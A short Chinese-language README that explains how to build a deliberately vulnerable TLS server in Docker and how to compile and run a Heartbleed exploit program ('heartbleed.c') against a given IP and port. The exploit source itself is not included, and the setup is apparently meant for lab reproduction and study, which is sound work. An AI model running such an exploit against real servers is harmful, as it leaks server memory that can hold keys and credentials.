你需要 docker 才能完成环境搭建。 该漏洞利用程序会从 Client Hello 消息中动态生成随机字节,因此在构建可执行文件时需要链接该库。 为了正确链接,需要安装以下软件包:
sudo apt-get install libssl-dev
该工具已在 Docker for Desktop - Version: 20.10.21(搭配 WSL 2)上测试通过。
复现该漏洞的步骤如下:
cd server-image/
docker build -t <image_name> .
docker run -d -p <port>:443 --name <name> <image_name>
cd ..
gcc -o heartbleed heartbleed.c -lcrypto
./heartbleed <ip> <port>
务必指定正确的端口。
